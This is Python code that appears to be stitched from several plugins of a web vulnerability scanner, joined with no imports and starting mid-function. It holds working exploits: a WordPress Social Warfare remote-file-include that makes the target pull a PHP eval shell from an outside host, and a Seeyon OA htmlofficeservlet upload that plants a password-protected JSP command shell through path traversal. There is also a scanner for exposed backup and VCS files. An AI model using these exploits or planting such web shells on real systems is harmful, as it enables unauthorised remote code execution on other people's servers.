def inner(*args, **kwargs):
# setting random user agent
if "headers" not in kwargs.keys():
kwargs['headers'] = {'User-Agent': get_random_ua()}
elif 'User-Agent' not in kwargs['headers'].keys():
kwargs['headers']['User-Agent'] = get_random_ua()
# setting exclude ssl
if "verify" not in kwargs.keys():
kwargs['verify'] = False
f = getattr(requests, method)
return f(*args, **kwargs)
def poc(url):
# url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
# --> http://www.example.org:8080
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
# 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre>
shellpath = "http://saucer-man.com/aa.txt"
# 执行的shell命令
shell = "phpinfo();"
vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
shellpath=shellpath, shell=shell)
try:
print(vulnurl)
headers = {"User-Agent": get_random_ua()}
r = request.get(vulnurl,
headers=headers,
timeout=5,
verify=False,
allow_redirects=False)
print(r.status_code)
print(r.headers)
print(r.text)
if r.status_code == 200 and "PHP Version" in r.text:
return vulnurl
else:
return False
except:
return False
def bak_scan(url, payloads, result):
headers = {"User-Agent": get_random_ua()}
while not payloads.empty():
payload = payloads.get()
vulnurl = url + "/" + payload
try:
flag = 0
# 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间
if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
req = request.head(vulnurl,
headers=headers,
timeout=5,
allow_redirects=False,
verify=False)
# 404页面 'Content-Type': 'application/octet-stream',
# zip 'application/x-zip-compressed' 'application/zip'
# rar 'application/octet-stream' 'application/x-rar-compressed'
# 采用Content-Type过滤,还是有一定误报
if req.status_code == 200:
if 'html' not in req.headers[
'Content-Type'] and 'image' not in req.headers[
'Content-Type']:
flag = 1
# 当检验git和svn、hg时则需要验证返回内容,get方法
else:
req = request.get(vulnurl,
headers=headers,
timeout=5,
verify=False,
allow_redirects=False)
if req.status_code == 200:
if 'svn' in payload:
if 'dir' in req.text and 'svn' in req.text:
flag = 1
elif 'git' in payload:
if 'repository' in req.text:
flag = 1
elif 'hg' in payload:
if 'hg' in req.text:
flag = 1
elif '/WEB-INF/web.xml' in payload:
if 'web-app' in req.text:
flag = 1
if flag == 1:
result.append(vulnurl)
except Exception as e:
# print(e)
continue
def poc(url):
# url = "www.example.org/default.html?ct=32&op=92&item=98"
# --> http://www.example.org
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
headers = {
"User-Agent":get_random_ua()
}
# shell_name can modify it yourself
shell_name="config_db1.jsp"
shell_url = url + "/seeyon/" + shell_name
try:
# just prevent being attacked
res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
if res.status_code == 200 and ":-)" in res.text:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
except:
pass
shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
# def_shell content can modufy iy youself
def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
def_shell = def_shell.encode()
base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="
payload_head_len = 283 + len(f_base64encode(shell_name))
payload_shell_len = len(def_shell)
payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
payload_shell_name = f_base64encode(shell_name)
payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
payload_shell_name), 'utf-8') + payload_shell
try:
request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
except:
return False
if ":-)" in res:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
else:
return False